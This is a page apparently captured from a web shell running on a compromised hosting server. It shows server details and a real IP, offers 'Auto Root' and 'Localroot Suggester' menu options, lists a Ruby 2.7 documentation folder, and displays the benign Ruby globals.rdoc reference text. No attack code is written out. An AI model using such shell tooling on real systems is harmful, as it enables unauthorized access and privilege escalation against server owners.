Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby27 /
share /
doc /
alt-ruby27-doc /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
irb
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
pty
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
syntax
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
ChangeLog
2.47
MB
-rw-r--r--
2023-03-30 16:04
ChangeLog-0.06_to_0.52
46.51
KB
-rw-r--r--
2023-03-30 16:04
ChangeLog-0.50_to_0.60
18.81
KB
-rw-r--r--
2023-03-30 16:04
ChangeLog-0.60_to_1.1
129.14
KB
-rw-r--r--
2023-03-30 16:04
ChangeLog-1.8.0
728.09
KB
-rw-r--r--
2023-03-30 16:04
ChangeLog-1.9.3
2.86
MB
-rw-r--r--
2023-03-30 16:04
ChangeLog-2.0.0
830.15
KB
-rw-r--r--
2023-03-30 16:04
ChangeLog-2.1.0
603.56
KB
-rw-r--r--
2023-03-30 16:04
ChangeLog-2.2.0
401.16
KB
-rw-r--r--
2023-03-30 16:04
ChangeLog-2.3.0
400.76
KB
-rw-r--r--
2023-03-30 16:04
ChangeLog-2.4.0
327.98
KB
-rw-r--r--
2023-03-30 16:04
ChangeLog-YARV
144.66
KB
-rw-r--r--
2023-03-30 16:04
NEWS-1.8.7
14.22
KB
-rw-r--r--
2023-03-30 16:04
NEWS-1.9.1
15.54
KB
-rw-r--r--
2023-03-30 16:04
NEWS-1.9.2
12.07
KB
-rw-r--r--
2023-03-30 16:04
NEWS-1.9.3
9.76
KB
-rw-r--r--
2023-03-30 16:04
NEWS-2.0.0
18.02
KB
-rw-r--r--
2023-03-30 16:04
NEWS-2.1.0
11.97
KB
-rw-r--r--
2023-03-30 16:04
NEWS-2.2.0
11.48
KB
-rw-r--r--
2023-03-30 16:04
NEWS-2.3.0
12.7
KB
-rw-r--r--
2023-03-30 16:04
NEWS-2.4.0
11.33
KB
-rw-r--r--
2023-03-30 16:04
NEWS-2.5.0
16.7
KB
-rw-r--r--
2023-03-30 16:04
NEWS-2.6.0
17.87
KB
-rw-r--r--
2023-03-30 16:04
README.md
6.35
KB
-rw-r--r--
2023-03-30 16:04
bug_triaging.rdoc
4.04
KB
-rw-r--r--
2023-03-30 16:04
contributing.rdoc
17.06
KB
-rw-r--r--
2023-03-30 16:04
contributors.rdoc
11.92
KB
-rw-r--r--
2023-03-30 16:04
dtrace_probes.rdoc
6.92
KB
-rw-r--r--
2023-03-30 16:04
extension.ja.rdoc
71.46
KB
-rw-r--r--
2023-03-30 16:04
extension.rdoc
68.5
KB
-rw-r--r--
2023-03-30 16:04
forwardable.rd.ja
2.34
KB
-rw-r--r--
2023-03-30 16:04
globals.rdoc
4.49
KB
-rw-r--r--
2023-03-30 16:04
keywords.rdoc
4.52
KB
-rw-r--r--
2023-03-30 16:04
maintainers.rdoc
8.85
KB
-rw-r--r--
2023-03-30 16:04
marshal.rdoc
11.51
KB
-rw-r--r--
2023-03-30 16:04
regexp.rdoc
28.82
KB
-rw-r--r--
2023-03-30 16:04
ruby-exercise.stp
1.08
KB
-rw-r--r--
2023-06-06 18:17
security.rdoc
5.72
KB
-rw-r--r--
2023-03-30 16:04
signals.rdoc
3.33
KB
-rw-r--r--
2023-03-30 16:04
standard_library.rdoc
6.06
KB
-rw-r--r--
2023-03-30 16:04
syntax.rdoc
1.1
KB
-rw-r--r--
2023-03-30 16:04
yarvarch.en
106
B
-rw-r--r--
2023-03-30 16:04
yarvarch.ja
16.41
KB
-rw-r--r--
2023-03-30 16:04
Save
Rename
# -*- mode: rdoc; coding: utf-8; fill-column: 74; -*- == Pre-defined global variables $!:: The Exception object set by Kernel#raise. $@:: The same as <code>$!.backtrace</code>. $~:: The information about the last match in the current scope (thread-local and frame-local). $&:: The string matched by the last successful match. $`:: The string to the left of the last successful match. $':: The string to the right of the last successful match. $+:: The highest group matched by the last successful match. $1:: The Nth group of the last successful match. May be > 1. $=:: This variable is no longer effective. Deprecated. $/:: The input record separator, newline by default. Aliased to $-0. $\:: The output record separator for Kernel#print and IO#write. Default is +nil+. $,:: The output field separator for Kernel#print and Array#join. Non-nil $, will be deprecated. $;:: The default separator for String#split. Non-nil $; will be deprecated. Aliased to $-F. $.:: The current input line number of the last file that was read. $<:: The same as ARGF. $>:: The default output stream for Kernel#print and Kernel#printf. $stdout by default. $_:: The last input line of string by gets or readline. $0:: Contains the name of the script being executed. May be assignable. $*:: The same as ARGV. $$:: The process number of the Ruby running this script. Same as Process.pid. $?:: The status of the last executed child process (thread-local). $LOAD_PATH:: Load path for searching Ruby scripts and extension libraries used by Kernel#load and Kernel#require. Aliased to $: and $-I. Has a singleton method <code>$LOAD_PATH.resolve_feature_path(feature)</code> that returns [+:rb+ or +:so+, path], which resolves the feature to the path the original Kernel#require method would load. $LOADED_FEATURES:: The array contains the module names loaded by require. Aliased to $". $DEBUG:: The debug flag, which is set by the <tt>-d</tt> switch. Enabling debug output prints each exception raised to $stderr (but not its backtrace). Setting this to a true value enables debug output as if <tt>-d</tt> were given on the command line. Setting this to a false value disables debug output. Aliased to $-d. $FILENAME:: Current input filename from ARGF. Same as ARGF.filename. $stderr:: The current standard error output. $stdin:: The current standard input. $stdout:: The current standard output. $VERBOSE:: The verbose flag, which is set by the <tt>-w</tt> or <tt>-v</tt> switch. Setting this to a true value enables warnings as if <tt>-w</tt> or <tt>-v</tt> were given on the command line. Setting this to +nil+ disables warnings, including from Kernel#warn. Aliased to $-v and $-w. $-a:: True if option <tt>-a</tt> is set. Read-only variable. $-i:: In in-place-edit mode, this variable holds the extension, otherwise +nil+. $-l:: True if option <tt>-l</tt> is set. Read-only variable. $-p:: True if option <tt>-p</tt> is set. Read-only variable. == Pre-defined global constants TRUE:: The typical true value. Deprecated. FALSE:: The +false+ itself. Deprecated. NIL:: The +nil+ itself. Deprecated. STDIN:: The standard input. The default value for $stdin. STDOUT:: The standard output. The default value for $stdout. STDERR:: The standard error output. The default value for $stderr. ENV:: The hash contains current environment variables. ARGF:: The virtual concatenation of the files given on command line (or from $stdin if no files were given). ARGV:: An Array of command line arguments given for the script. DATA:: The file object of the script, pointing just after <code>__END__</code>. TOPLEVEL_BINDING:: The Binding of the top level scope. RUBY_VERSION:: The Ruby language version. RUBY_RELEASE_DATE:: The release date string. RUBY_PLATFORM:: The platform identifier. RUBY_PATCHLEVEL:: The patchlevel for this Ruby. If this is a development build of Ruby the patchlevel will be -1. RUBY_REVISION:: The GIT commit hash for this Ruby. RUBY_COPYRIGHT:: The copyright string for Ruby. RUBY_ENGINE:: The name of the Ruby implementation. RUBY_ENGINE_VERSION:: The version of the Ruby implementation. RUBY_DESCRIPTION:: The same as <tt>ruby --version</tt>, a String describing various aspects of the Ruby implementation.